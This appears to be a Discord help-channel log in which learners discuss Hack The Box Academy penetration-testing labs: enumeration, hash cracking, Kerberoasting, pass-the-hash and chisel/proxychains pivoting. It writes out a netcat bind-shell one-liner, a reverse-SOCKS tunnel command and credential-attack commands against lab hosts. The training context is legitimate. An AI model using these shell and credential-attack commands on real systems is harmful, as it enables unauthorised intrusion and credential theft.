#modules
should I try resetting the target IP?
Wait I just did the command through PowerShell to disable it and now it's not being removed. But it showed that it was already turned off when I checked it a bit ago. That's odd.
Holy hell
Has anyone done the nmap
Pentesting route
On attacking services
I’ve been stuck in question 3 for an hour
I thought you just
smbclient -L -N \\<myIP>
Just keep getting an error
How am I supposed to know bobs password wtf
Bruh the password is given in the beginning of the module
I thought I was supposed to find it
An hour down the drain
it's given in the beginning of the module
How come when I type it in it doesn’t do anything
lol I found that out
Just says login failure when I type the password
Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe
after i found the event is services.exe the answer?
Windows Event Logs & Finding Evil mini-module badge
hey im on the information gathering web edition virtual hosts but im stuck i ran the following command gobuster -u http://<IP>(i am confused because should i be using the target ip or the inlanefreight.htb but nonetheless i tried both and the latter gave me an error) -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million.txt --apend-domain
did not work and i spent 10 minutes waiting getting a blank result
anyone got any tips?
strange
Holy hell something is wrong with that virtual machine 😭😭
I had to put in the password 5 times before it worked
Then I restarted it to see if it was me
And it took 5 errors again
Then I tried it again and same thing
Fix that shit mods
Use the latter, DNS subdomain enum doesnt work with ip, you need to put it in your hosts file
It took me 3 hours to figure out I had to spam tf out of the password
Bruh I should have just moved on
You on UDP vpn? Might be a bad connection
Yeah might've been dropping packets
Well up to you cos tcp is wayy slower
But is more reliable
Also discord mods or Community contribs arent staff so no access to the modules
I did bro
Show
Too late I gave up and I’m going to bed 😭
xD
In the settings section? 🤣
lol
i have to create a exploit but i dont know how i mean i just learned for windows not for web
i have to use this exploit https://www.rapid7.com/db/modules/auxiliary/scanner/http/wp_simple_backup_file_read/
can someone explain to me pls
Use msfconsole
show options will show you all the available settings to configure
The flag is at the location mentioned in the question
See you later 🙂
OMG, dude thanks a lot for this! Can someone from HTB team please fix this?
It's just a windows thing, but you can make a post in #1234357888114364508 if you think something needs to be fixed.
Hi anyone willing to help/discuss with me for - dacl attack 2 - skill assessment question 1
i know what attack to perform, but after all the process i still cannot access the flag, i'm doing it in windows machine provided.
Update
Managed to get it with linux, but still curious why it failed using windows, if someone is able to perform it from windows could we have a discussion, thanks.
Hi all, I'm on the "Shells & Payloads" module. I have a question to the "Bind Shell" section. In the command to initiate the bind shell on the target machine, the IP of the target is used in the nc call: "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f" . Why is this needed or beneficial? I tried in the section with and without the IP and both works. Any insight would be highly appreciated!
could be if there's multiple interfaces on the target
you can specify an ip to listen on a specific interface
that makes sense, thank you!
anyone good at reverse engineering? i have question.
#binex-rev read and follow #welcome to access
i got it, with the pwnbox. i guess the vpn is ass
hey guys, I was connecting to victim machine using chisel as said in the pivoting, tunneling module
I am facing this error when I try to connect client pivot host to server attacker machine
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
you need to compile it statically or grab an old release binary
Hey guys who has the same problem on the AI path?
Should be pretty cut and dry from a Windows perspective if you got it via Linux. If you still wanted to chat about it, you can DM.
Is it possible to pass the first question of the "Attack Tuning" section from "sqlmap Essentials" without creating a tamper?
I tried hard to get it without the tamper, but I couldn't
How can I do it?
Please help me 😦 I am so stuck on this Skills Assessment of Information Gathering - Web Edition.
Description: What is the API key in the hidden admin directory that you have discovered on the target system?
Steps:
I have been facing "Error: error on running gobuster: bufio.Scanner: token too long" from the subdomains-top1million-110000.txt but I might have solved it with awk 'length($0) < 64000' subdomains-top1million-110000.txt > filtered_wordlist.txt
but then I just cant find the Status: 200 OK after doing the scanning 😦
p/s: I did add the ip in /etc/hosts and I am connecting to the htb vpn too. Despite working on a Kali Linux virtual machine, I think the open vpn is still working fine.
Your wordlist appears to be... messed up.
Sorry, I forgot to change the name when writing this because I copy from the commands I used on WSL 🥲 but still the problem persists
this is my second attempt with no 200 OK found 😦
what are the rewards specified in last line?
Your wordlist is broken - no use of gobuster will ever work until you resolve that.
how can I fix it please 😦 I did a filter because I guess the wordlist has some errors with length of a specific word. This is my attempt without changing the wordlist
ah yes, it was my mistake
so sorry and thank you for the hint on my overlook
You get a gold star -- there are a few HTB badges. If there's anything more in the works I'm not aware.
You'll get a badge
Is the "Footprinting Lab - Hard" skill assessment supposed to take hours to scan? i lowered the type of scan to something less comprehensive, am using the -A aggressive nmap flag, and its still taking forever.
Footprinting IPMI module - Im using pwnbox and i wanna know if its normal that hashcat take so long for a simple module exercice ?
In my notes I said that it does take a long time. I used the flags -sU
It shouldn't take that long
So make sure you have the right kind of hash and that you're using the right flags in hashcat. You can check the hashcat website to make sure what hashes are supposed to look like
i used this cli:
hashcat -m 7300 hash -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
and it's running since 10min
use the rockyou.txt wordlist like in pretty much every assessment in hackthebox
it was way faster ty brother 😅
its the standard for CTF challenges to take like less than 10 minutes with the rockyou.txt wordlist when bruteforcing anything. If it takes longer, brute forcing is probably not the way to go.
Ok tysm
Guys can someone help me, i was doing the "Protected Files" module of "Password Attacks" and the question asks: "Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer."
But where should I get the password for Kira? Like do i need to bruteforce ftp or ssh with rockyou? (password.list don't have it)
It's going to be from a previous section from the Password Attacks module. Highly advisable to save harvested creds from that module, as a just in case you need it later in the module. I just checked my notes and you should have gotten those creds from the Credential Hunting in Linux section.
Guys I am helping cybersecurity student to get into cybersecurity, I gave them this advice, and everytime I do, I feel like they become repulsive off me, is there anything wrong with my advice ?
First of all, your entire journey is going to be based on a question mentality
Secondly, for technicals, your curiosity in understanding a specific topic would highlight u between your colleagues, whether in uni or work inshallah, start with these three
- Python : Explore the syntax thru the documentation + do codeceafters and learn how to automate network requests and file i/o, then finish the first 5 to 10 projects here : https://github.com/kurogai/100-redteam-projects
- Learn linux thru practice, learn about wsl and Linux basic administration, and how can you adapt only a cli environment, but it would be better if you can install it alongside windows, and for 1 hour a day experiment with it and try to do all various tasks, youtube and hackthebox academy have pretty good resources
- Last thing, a good field you can start in is web security, go to portswigger, It contains labs and verbal explanations in all various topics in web security / attacks ( with uni account, u can have an 8 dollars subscription on htb academy, I do really recommend it, the penetration tester path is verrryyyyy educative )
The last message is that researching Google is going to be your friend along the way, in everything, and question everything you face and try to understand the "why" and the "how"
Htb academy : https://academy.hackthebox.com/
Portswigger : https://portswigger.net/web-security
Install wsl on your windows before u start in Linux: https://youtu.be/AfVH54edAHU?si=RvW9cUe1ktvwKu-U
For linux, this guy is very beginner friendly : https://youtube.com/playlist?list=PLIhvC56v63IJIujb5cyE13oLuyORZpdkL&si=vQyrUnmvjJv-MDSA
maybe because your delivery feels like a phishing email
Hey guys I have this problem with the skills assessment of the prompt injection module, can anyone help?
It's on the pwnbox btw
Thank you, i will do it again 
Ru serious ?
Hello! Currently in password attacks shadow passwd and opasswd section. I transferred the .bak files then combined them into a tmp/unshadow file and unshadowed them i think using the command in the module. I've been trying to use john and hashcat to crack them with the mutated_password. But hashcat gives a token exception 55/55 and john gives a wrong password. I was trying formatting md5 but that didn't work either. Don't know how else to go about it. Besides maybe a wrong file download
yes
and the title says "urgent: your future depends on this" 😭🙏
Something might have gotten skewed when you transferred the files. I can check out what you did via DM and let you know if you should just reset and try again.
Anyone here did the Cat room, kinda stuck in the last step
Better off asking that in #boxes unless it isn't a box.
I figured it out. I wasn't paying attention and just copying commands, not realizing for some reason when I tried to unshadow the pass hash would disappear but it showed up if I sudo and John the downloaded .bak file. Luckily I was able to be allowed to crack that file instead. But I don't know why that works, I assumed I'd have to unshadow them both.
that makes sense as the shadow file is only readable by root
Pass the Ticket (PtT) from Linux Which group can connect to LINUX01? When i david@inlanefreight.htb@linux01:~$ id
uid=647401107(david@inlanefreight.htb) gid=647400513(domain users@inlanefreight.htb) groups=647400513(domain users@inlanefreight.htb)
i enter the group name for the question and its not working. Can someone help?
Suggest rereading Identifying Linux and Active Directory Integration from the section reading.
found it same process different user group was found
Experiencing difficulty continuing with logrotate section of linux priv esc. Repeatedly encountering a resource dependency error: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./logrotten.1). Is there a way to still execute the payload without sudo to install the missing dependency?
in order to avoid dependency issues you either need to compile on the target or compile the exploit statically
you have to bear in mind that the GLIBC version on a machine may differ from what you have on your own machine
For whatever reason I get a whole slew of unexpected errors attempting to compile on the target. I should also add that I compiled on the pwnbox which I figured would have a similar configuration to the target
why would it have similar config to a target? it's an up-to-date attack vm
the pwnbox is just a hosted parrot VM that you can use instead of your own
Regardless if I cannot compile on the target or modify the packages is there an alternative course of action?
I will try that thanks
What is the technical difference between static comp and the 'regular' method
static compilation basically packages the required libraries with it
instead of relying on the library to be on the machine
Ah that's good to know, will probably save me more than a few headaches in the future. Ill give it a go
That did it 🙏
is the id_rsa formatted properly?
it requires the ---BEGIN and ---END lines
always make sure with stuff like md5sum and stuff like that to make sure the checksums work out
it also helps to provide the module and section name
also: it's -p for port
not -P
hello, can anyone help me with the last question What is the flag contained within flag.txt in the skill assessment of login brute forcing module? i found out the name is T... but i dont know how i go from there
The module definitely covers what you should or could do next.
i build custom wordlists with cuppy and username anarchy but i dont know even what the service is
ssh doesn't require password so it doesn't work and there is no ftp server?
If you are saying there aren't any local services, I'd reset the target.
no there is ssh but I dont get how i can login there or if i need to.
The module is about brute forcing logins right? You can DM if you'd like.
Hello all. I am having problems with Active Directory Enumeration & Attacks Room, specifically with DCSync Lab. The lab keeps disconnecting seconds after I successfully RDP. I don't know what it could be, I switched VPN file, I restarted lab uncountable times. This is getting on my nerves and I am thinking of cancelling my subscription because of this problem.
I've even tried with HTB VM, but the same problem, after few seconds or minutes it keeps disconnecting RDP with errors
So I think it's a problem with the lab.
in the getting started final of the pentest path where you test your knowledge there is an upload file option in the admin portal which doesnt work when i press this. is it supposed to not work and i need to find another way or is it a glitch?
I got problems with using proxychains and chisel. It's the crackmapexec lab. After changing the proxychains.conf to socks5 1080. Then setting up the reverse server on pwnbox and client on the ws01 they connect. But using proxychains crackmapexec smb 172.16.1.10 -u - p --shares and looking at the verbose output it says no route to host and fails. I can't figure out the problem. I have used proxychains and chisel before and I'm doing exactly as I use to (i think)
im doing the hashing correctly but my pc is bad (using 5th gen i5 to crack the hash)
can someone dm me the hash to move on
the plain text*
Is the second task/question of this section really supposed to take forever?
use pwnbox
No. If you feel your computer isn't good enough, you can use the pwnbox.
ah yes
I forgot that option
When pwnbox is faster than my actual laptop...
@round parrot make sure that the IP you are specifying in your command is actually reachable and smb is open there
I checked with evilwinrm. Logged in on ws01 and enumerated the share on dc01. So it's there and should work.
proxychains evil-winrm works ?
echo 'HashValueHere' > hash.txt
Nope, I can reach ws without proxychains, so I used evilwinrm and from ws01 I could use net view on dc01
Also cant connect to it directly from my host to send something
And see the share
Any Skills Assessment - File Upload Attacks chads? Can't even access flower.jpg (I have leaked upload.php using XXE and gotten the directory and naming scheme)
the pwnbox has a clipboard tool, you can see in the bottom of the screen
Something might be wrong with your proxychains/chisel setup there @round parrot
Life savior
Yep but even following the example it doesn't work. I got the connected on chisel. Changed the proxy conf to socks5 and 1080. So I can't really figure out what it is
okay curl instead of burp worked
Pwnbox hashes 2.5x times faster than my laptop (using linux as a main, not vm)...
Granted I haven't done that module just yet. Did you comment out the socks4 in the conf ?
hi could you help me with this question :
Yep, even changed the 4 to 5.. still... I guess it's a reset somewhere
Hmm
Changing the Browser to a chromium based, and using Pwnbox I'm able to keep working on DCSync. The only solution I found...
Can anyone help me with Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt. Password attacks, pass the hash
@fair cove isn't that attack explained in detail in the module itself ?
If it is I am stupid and I cant do it
DM if you wanna talk specifics
Pwnbox has been doing it for 32 mins, does it take that long ?
I double checked the hash format on hashcat examples and everything is right
Ok my bad
I'm stuck on the last question in this module i look the walkthrough and did it myself but cant figure it out https://academy.hackthebox.com/module/289/section/3246
I mistakenly copied the one from hashcat examples into hashcat
Braaah
Its taking a lot of time too
Did you try it with sudo
Can someone help me solve this question from the Footprinting module on the DNS page:
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
You need some subdomain enumeration if I remember correctly @eternal current
i just set the password file to rockyou in msf and it worked
Same
I blindly followed the module and chose to crack it with
Computational power ?
I mean hashing lol
I haven't been able to find it 😦
What does dig any 'Target' @'IP' give you ? @eternal current
What about the zone transfer - axfr ... Go from there
Maybe try different wordlists too.
is there any way to connect to the terminal using my own when doing modules? Using the built in one slows me down quite a bit?
im on mac tho idk if thats an issue
yes use the vpn from your kali or whatever
no problem there install openssh (it might be on there already) download the vpn file and connect
"yes" but you need to connect from your testing environment
connecting from a mac box without like... any tooling is not gonna get you where you wanna be. prob best to setup a kali environment
kali vm i mean... same thing
So I need to use a vm tool for that?
To create a kali vm then openssh from that into the environment?
Basically what I’m trying to get at is that currently it’s really annoying having to read all the text etc and be scrolling up and down to answer the questions
To be able to see the instance
Idk if there’s some way to pop out the instance maybe?
Yes, you will need to host a VM, and connect in from there. Depending on what mac you have, you'll likely need an arm image, which may give you some trouble with certain applications.
Okay I see, let’s say for example I was running my PC on a Linux OS, could I just do everything on my own pc then?
To do most any of the labs, you'd need a pentesting distro, which should not be run outside of a VM.
Ahh okay I see
Is there a way to do this?
From the HTB instance
"pop out"?
Like currently the only way to access onto that instance is to be scrolling up and down until I see the box for it
So like go have it in a new window on another monitor
Whilst being able to scroll up and down the read the questions and text
There should be a button to have it in a new tab. Depending on your browser, you could just drag that tab to another monitor.
Oh okay I’ll have a look next time I’m on it thanks
In the real world do people use VMs for their pentesting?
Like they will never use their own machine?
Pentesting distros are not safe to use baremetal. They are not built for stability, they have to include tons of outdated packages (as some old tools require them), and using it as a daily driver would be dangerous, due to all the tools that would be available, if the machine was compromised at all.
VMs also make it easy to take snapshots, so you can have an environment that is always the same for reproduction.
Okay I see
i need help at: Kerberoasting - from Linux
Ad enumeration and attacks
https://academy.hackthebox.com/module/143/section/1274
i use this command : GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
and just give the pass (known from one part of previous part) || Klmcargo2 || which is not even a spoiler its mentioned somewhere in the module. But it says incorrect credentials. how to solve this now
just a little tip, you can put the password in your command
GetUserSPNs.py -dc-ip 172.16.5.5 inlanefreight.local/forend:password
can I get some help with https://academy.hackthebox.com/module/296/section/3394, I cannot seem to download wpscan on kali linux, and even when using the instance and the exact command used earlier in the demonstration, wpscan -e p --url https://10.129.12.10 --disable-tls-checks --no-banner --plugins-detection passive -t 100 (the ip address changed to the target) the instance terminal gets stuck with the message [i] Updating the Database ... until it eventually times out
wpscan comes with kali
mine replies with the standard Command 'wpscan' not found, but can be installed with:
sudo apt install wpscan
weird, did you download the smaller version? they do have different versions with various tools. it sounds like you have it because you say the command updates the database
that happens when I run it on the htb daily instance, the parrot terminal
that's parrotos, not kali
I've been trying it with an openvpn connection using kali, and with the daily instance
make sure you can get online then wpscan should be able to update
what do you mean by get online?
make sure your kali box is connected to the internet
if wpscan is timing out updating the database i assume it can't reach the servers, so it's some kind of network issue
well, the updating database error occurs when I use the parrot terminal on htb, I'm pretty sure the command is right, on kali sudo apt install wpscan results in tons of errors that seem like failures to install the necessary dependencies
here is the parrot terminal error after timeout
the pwnbox has limited Internet connectivity unless you have made a purchase i think
Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Timeout was reached)
your original statement said kali, which is not the pwnbox
my bad, I started with kali then said the instance in place of parrot
have you spent money on the site?
no
that's why. the pwnbox is limited
try --no-update as an argument maybe that'll work
Just ask your question here if it's about modules
Scan Aborted: Update required, you can not run a scan if a database file is missing.
probably just use your kali vm then. note that you can't use the pwnbox and vpn at the same time, one or the other
that might be the issue, I used the instance because openvpn was failing
they share the same IP so you can only use one at a time
got it, seems my openvpn has been off so that can't be the issue
well you know why the pwnbox is failing, so you'd have to switch to your kali box on vpn
or spend money on the site
I have no idea you'd have to reach out to support on the website
alright, thank you for your help and insight
anyone have issues installing sqlcmd?
im on Attacking SQL Databases module
tried sudo apt install sqlcmd as well :()
sqlcmd is a Windows command
omg im so out of it thank you
Hi is there anyone that can help me with the RDP and SOCKS Tunneling with SocksOverRDP section in the Pivoting, Tunneling, and Port Forwarding module? I've gotten to the point where I needed to connect to the Windows server at 172.16.6.155 with jasons credentials as instructed in the question, but whenever I try to connect through Remote Desktop it immediately closes my connection, saying it was lost due to network connectivity problems. I've already loaded SocksOverRDP.dll and configured Proxifier properly. I've also restarted the box as well in case that was the issue but it wasn't. Any help would be greatly appreciated.
Try changing servers or even regions. Make sure you're on the TCP VPN. MTU can also be an issue sometimes, and there are some commands you can use to optimize your RDP connection.
All you need to know about the VPN Connection for Academy
Ah nvm, figured out the issue. Had to set the performance to modem in the experience tab. Didn't think about that lol. Thanks for the help though.
Hello, do you know that in the JavaScript deobfuscation module, the source code section already has the flag, but it doesn't accept it as valid?
I already solved it xD
The key thing to this is to look for other available services; i dislike that they use netcat for connecting to these services, but it is what it is -- utilizing the standard tool for connecting to one of the services is 10x simpler than going through the nc route
this worked thank you
but why ?
maybe because you were inputting the password incorrectly
i will put it manually lets see
Hi I want some newbies for my teams 0 experience member for my ctf team those who want participate join my team
Htb ctf
you can also paste the password when it prompts for it
make a post in #1318239802931286066
it works
So my clipboard was the problem
Thank you !
How much would a bloodhound scan differ when we gather the data from a user with default privileges vs a user with more privileges, like an admin.
what module is that
anyone know why impacket-smbserver isnt pulling netntlmv2 hash?
thank you so much
You should use your own IP
look what you're calling
:)
omg
thank you! i took like a 4month hiatus from this and its not clicking yet. thank you for the push 🙂
Not actually a module, just a random question, I thought I asked on the red team discussion, my bad
are you asking for help on an exam bro
oh okay
you'll see users, groups and a few machines on a low priv user, but none of the juicy stuff like who's logged in where or what acls you can abuse
you might scrape together a kerberoast target if you're lucky
Hmm I get it, thanks a lot man
The wayback machine section seems softlocked
The archives for the questions no longer exist
Literally the only accessible archive left is Feb 10 2020 which displays nothing
The wayback machine shows entries but literally none can be pulled up
The records must have been erased during that whole incident a few months ago :/
module section and question?
Information Gathering - Web Edition -> Web Archives
" How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234."
And related
I'm seeing a 302 redirect that seems to loop indefinitely
it seems to be working for me
always know your target, htb is not an american company
I have no idea what you're doing but every archive for "hackthebox.com" is not pulling up for me
anyone else having massive lag issues, Active directory skills assessment is not doable, all connections keep timing out, on several vpns now
Try changing regions, or read the VPN guide which has some great tips
All you need to know about the VPN Connection for Academy
they all have medium load too , even the less used one, yeh I have, I've tried them all
Is the specific date August 8 2018 working because recent archives are showing up for me, just not the ones needed for the question.
HTB wasn't hackthebox.com in 2018
Just realized there's even a hint of it in the module
@thin parrot
look at the images
hello,
can someone help me with a task in module network enumeration with nmap -> service enumeration.
I have a problem with the question: Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.
what I did:
I used service fast scan to get all open ports and their service versions:
Host is up (0.0089s latency).
Not shown: 94 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: NIX-NMAP-DEFAULT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
then I used the method described in the module:
sudo tcpdump -i tun0 host <local_ip> and <target_ip>
then
nc -nv <target_ip> <port>
then Im trying to get smth changing the ports in nc but I cant get anything from it
can someone tell me what am I doing wrong or maybe I'm not looking at the right place?
I think I may know which lab this was as I struggled on this one but without giving too much information (assuming I have this right) perhaps take a further look at what may relate to whats hosted on port 80?
Have you tried: checking banners? 👀
1 by 1
yes... am I blind or smth? haha
gimme 1 moment I can't remember exactly what I did to get this
have you tried enumerating ALL ports?
gonna do it again
what's your nmap command looking like?
got it? 
I had to wait more like BRUUUUH
yeah I knew it was on an off beat port
yeah I usually do a fast port sweep scan then a script scan of all those ports
btw @waxen totem, do you remember doing those Labs (SS)?
Is Hard Lab like H-A-R-D or "human level"?
IIRC it was human level FOR ME
only cos I put off academy for a while and actually was doing boxes 
the only one I was stuck on was the medium lab cos my scan gave me false data 
im wondering when should I start doing boxes
mate you hacker you already been doing boxes 
It was a year ago... forgot most of the things haha
Does anybody know if chisel works on Windows Server 2019? I tried the latest version and it was incompatible
I'd look for chisel binaries around that time otherwise you outta luck
There's no reason it shouldn't work, unless maybe you have defender on.
c:\chisel.exe client 10.10.16.18:8001 R:socks
This version of c:\chisel.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.
That's... odd. I wonder why they compiled it like that
You can always use this powershell script instead: https://github.com/p3nt4/Invoke-SocksProxy
Which module is this?
Maybe its already on the machine in C:\tools
AD Enumeration & Attacks - Skills Assessment Part I
I had to upload it
Are you using the version from the pivoting module?
yes, though that was a linux one , and in that module i had to use a downgraded version to get it to work
this time using windows compiled executable
Shouldn't have any issues like that, unless maybe there was corruption when you copied it over. Either way, the script I linked is just better than chisel in every way.
Awesome ill give it a go, can it connect back to a chisel server on my attack host?
No, it does not require a server portion. It just hosts a socks proxy on the host directly.
awesome much appreciated
SSH for linux socks, and the script for windows
module (using crackmapexec) submodule {Searching for Accounts in Group Policy Objects}
whenever i try to do the practical questions getting this error
The NETBIOS connection with the remote host timed out.
tried restarting target machine
Try adding the argument --smb-timeout 5
worked thank you
been struggling to connect via ssh in terminal. keep timing out.. just trying to do the linux fundamental mod
can you ping the target
hello can i please get some help with starting point meow task 6 (What service do we identify on port 23/tcp during our scans? ) thanks so much
success!
I was off by a digit
now we are on a roll - that held me up the whole time 🙂
hello can i please get some help with starting point meow task 6 (What service do we identify on port 23/tcp during our scans? ) thanks so much
portscan bro
perform a service scan
ye
i was thinking port scan but it ends with t
what
yeah
he means the service ends with the letter T
yes exactly
@outer osprey do you know what tool to use to scan ports?
bro just service scan and see what results you get and remove the version number
n mapp is what i use
run nmap -h and search for "service scan"
specify the port so its faster
let him look for it in help/man page (can't give the answer straight up cuz it would be cheating or smth haha)
@outer osprey got it?
Try asking in #starting-point
someone help me tho
tbh no
file inclusion assessment i am stuck
i used directory methods and mixed with url encode
still i would get invalid input
i am guessing its filtering out ...// even after url encode i tried using php wrappers still dint work
@outer osprey please don't spoil answers. also starting point discussion is in #starting-point , this channel is for modules on the Academy platform.
@cloud urchin can I give him the command? he got the answer
I'm sorry, what?
command to get the answer he was looking for (nmap [options]) cuz I guess he just searched up tcp/23 service
he needs to ask in the channel dedicated to starting point, but he got the answer already he said
sorry i'm new to the discord
is tlattice here bro need ur help fr im actually dying here
yea you can rdp from windows machine to other one
there is a windows pivot rdp method
but how would I know if rdp is allowed there in the first place?
hmmm you're asking if the other machines rdp service is open?
Could I get a bit of a hint on Information Gathering - Web Edition -> Skills Assessment -> "What is the API key in the hidden admin directory that you have discovered on the target system?"
I found the hidden admin directory, trying to access it returns permanent redirect. Not sure what to do from here
@tulip copper please don't spoil content, you're revealing addresses and such of a skill assessment that people need to find.
@tulip copper there is metasploit module using a pivot so scan the targets and find the target info
i cant recall properly but i remember doing something like this
I have to get meterpreter first on that windows_1 (first machine) and autoroute traffic through SOCKS
yea now i remember most likely when u try nmap through proxychains it will not give you a proper output you can use metasploit auxiliary modules to find about the other machines on the network
I know that this skill assessment wants you to get the port directly but I wanted to expand and run a scan from attacker host, I know I need to double pivot but how is my issue :/
are u rdpd into windows 1?
yes and can reach windows_2
did u rdp into windows 2
no
do u have creds?
yes
try rdp then
I got all the flags
Anyone..?
my concern is that in real engagement you wont be trying port by port
if I run commands from my box to the network of windows_2 it would be convenient
oh so instead of having windows 1 as ur pivot u want windows 2 as ur pivot?
well thats not possible
cause u need windows 1 to reach 2
You could do it actually through pivot
not really, now my pivot is linux machine, I want windows_1 to be pivot
Use ligolo or chisel to start a tunnel or a socks proxy
If you're using chisel you'll need proxychains setup
Also proxychains only works with TCP iirc
So using ligolo is much more preferred
from linux machine to windows_1?
ohh ok I have to get familiar with ligolo
breh i thought you had windows 1 as pivot cause u said this
i got confused
mb
sorry no, I have the linux machine as pivot to get into network of windows_1
I was thinking about using 2 dynamic port forwarding with ssh , dynamic port forwarding from my box to foothold linux machine. and access to that linux machine and use again dynamic port forwarding inside linux host (since windows_1 have ssh open) to access windows_2 network. But my issue is that linux machine doesnt have proxychains
what tools does the host have
well you could copy over proxychains
using scp
I have to try this
I see double pivoting is not covered in this module nor ligolo
yea
thats y i told u to rdp
from ur linux
after u scan the services and find the creds
are you talking about first creds?
yes to lateral movement
yes
thanks bro for assistance
Now ReconSpider is not working
Man they really need to make a second modules channel
what for?
I gave up and looked up a guide online and I think something is wrong with HTBs end now which is pissing me off
ReconSpider?
The web crawler
This is just some outdated OSINT tool
Because sometimes it becomes a bit of a clusterfuck in here
did u find the vhosts
And for some reasons targets last 30 minutes less now which makes the time crunch much worse when you get stuck
I am well past that step
i already passed that as well
ok so what are u trying now
I'm trying to get the email from another subdomain that was hidden based off of another subdomain found in the prior step
And to do that I'm trying to use reconspider which can pull information such as email addresses and a bunch of other pages/their contents etc
This is from the cbbh path yes?
However dev.web1337.inlanefreight.htb:ip yields nothing there is nothing under this domain according to the web crawler
There are no index pages that supposedly exist
Penetration Tester path
That’s what I was thinking too
it is literally what gobuster shot out to me
no check the results of reconspider
btw what exegol image you using?
I did, the results.json is empty
reinstalling mine now 
what
Nightly
brave soul
I just ran gobuster again
dev.web1337.inlanefreight.htb:port
Wait wait
You’re using gobuster
get verified: instructions --> #welcome
yes im using gobuster
did u add this to hosts file
remove the port before u add
and I swear if you added it in with the port I'mma stab you
oh yeah that'll do it 🤦♂️
breh
Oh no dont worry I didnt even add it
Ok ReconSpider is still not returning anything
delete the folder and rerun it
i think ur looking at the same result
in the command add the port
i did add the port
i feel like giving up these labs are such curveballs i dont get it
but no i have to pay annually to get step-by-step help
That is in fact the point
they're designed to force you to research and think logically
I have 6 minutes till I literally have to restart this entire process
and find your own mistakes of course
there's a + button next to the target timer
you can get 6 hours of target time
There is no + on my end :/
I literally have a gun to my head to finish this entire path by mid april so I dont have time to spend 4 hours on one fucking question because god forbid somebody posts useful instructions I can actually learn from
i now learn the CBBH path what is ur problem specifically may i can help u
bruh legit i gave u whats supposed to work
show me ur command
oh well
copy paste here
Oh my fucking god its because I didnt give it permission to create results.json
Thats why its not working
file inclusions
assessment
i solved already
i found parameter page
but i tried all the methods dint work
i mixed with url encoding still
dint work i tried automated that dint work
give a pointer
Oh my god it fucking ended on me
You know fuck HTB I'm charging back this whole fucking bullshit on my card, this platform SUCKS.
oh sorry i don't start the LFI section yet but no problem if u share ur payload and the response of the server
Sorry bout your frustration but that is the nature of Cyber
you can always provide feedback /feedback
i finish LFI section for ewptX
may its help us to solved
yea the page would just show invalid input validation thats it
i checked for session poisoning too
no cookies to poison
havent tried server log poison
lemme see
Just follow instructions in #welcome 🙂 3 simple steps
Account identifier can be found here: https://app.hackthebox.com/profile/settings
Then /identify TOKENHERE
Well I finally got to that.
I'm still not sure why ReconSpider is not working
All the vhosts are added
If the IP is an external one, yes (not 10.x.x.x), but without the port in your hosts file.
I mean I am literally following the steps of what someone did and the only difference is that they are getting results in results.json
Whereas I am getting absolutely nothing
are you tryna spider the subdomain or the base site?
That specific subdomain not the base site
I’m on my phone so can’t check atm. Gotta bring my kids to school and daycare in a few min too
I actually finally got the results
Something must have been funky with the last session I had
I really need to set up a vm and download the vpn from now on
I have no idea what went wrong though because I entered it with http:// as I did before, only difference now is that its giving me results
I know I caught myself accidentally doing resuls.txt instead of .json but I caught that before the new session...
This is genuinely more frustrating than software engineering, I hope it wont always be like this 😓
yeah it's really so much better than parrot
cs is frustrating
Hope I don't scare you away but:
get used to that frustration, most of the time in cyber you won't know what's going on on the back end, you'll try things you think would work but it wont because you're missing pieces of the puzzle. Being frustrated and stuck in the deep end to either swim or drown is the nature of cyber security
cs job market is even worse
its cooked for recent grads
I want to get some experience with Kali see which I prefer over the other
Also I won't be scared away, Software engineering was one of the most soulless mindless tasks once you get the general bearings down. At least it was for the field I worked in. Same issues every time. Same code. Same crap. I wasn't creating or inventing something or coming up with creative solutions. So I'm sticking this through no matter what. It's way more enjoyable, but also way more difficult and frustrating
and yes it took me 800+ applications and 5 interviews to finally get a job as a Software Engineer
and I've been told entry level is also very rough for cybersec
But despite the stress I actually wake up looking forward to this, for the most part 
can some one please give me pointer
like im still stuck since 5 hrs
what're you stuck on @unique ether ?
If its a CBBH/CWEE module feel free to dm me to avoid spoilers 🙂
Hey guys, having some weird trouble: proxychains is working, but for some reason cmb does not want to, it managed to get through once but connection dropped. Is there a timeout setting or has someone had similar issues? This is for skills assessment 1 of Active directory enumeration and attacks
sudo proxychains crackmapexec smb 172.16.6.50 -u svc_sql -p xxxxx
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
